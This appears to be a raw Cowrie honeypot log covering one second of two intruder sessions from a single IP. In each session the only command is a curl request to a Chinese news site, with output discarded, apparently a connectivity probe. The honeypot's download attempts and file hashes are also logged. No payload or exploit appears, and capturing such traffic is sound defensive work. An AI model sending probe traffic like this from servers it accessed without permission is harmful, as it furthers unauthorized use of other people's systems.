{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.059993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.060757Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.067615Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.068577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.107843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.108975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.113139Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.114636Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.120373Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.121329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.155071Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.156116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.160198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.161506Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.167295Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.168366Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.199625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.202233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.203739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.215717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.216774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.251277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.252287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.267872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.268790Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.289720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.290968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.306435Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.307612Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.311293Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.312598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.331115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.332107Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.365802Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.367276Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.386715Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.391982Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.405671Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.407223Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.420049Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.424060Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.442837Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.443803Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.462144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.463149Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.513081Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.536924Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.539911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.541304Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.563143Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.578849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.580018Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.582185Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.583668Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.585868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.586821Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.614629Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.671940Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.675089Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.676053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.679217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.680081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.707163Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.728775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.729835Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.732147Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.732867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.829712Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.830734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.834653Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.835608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.868332Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.870026Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.907239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.908183Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.912601Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.913335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.952141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.953075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.957053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.957920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.997021Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.998291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.000602Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.002426Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.006239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.007554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.048237Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.049719Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.057277Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.058213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.063252Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.067275Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.094953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.095989Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.100555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.101223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.102311Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.103220Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.137949Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.140130Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.143600Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.144501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.154405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.155450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.176835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.178639Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.191101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.192138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:57.208069Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.209218Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:57.220268Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
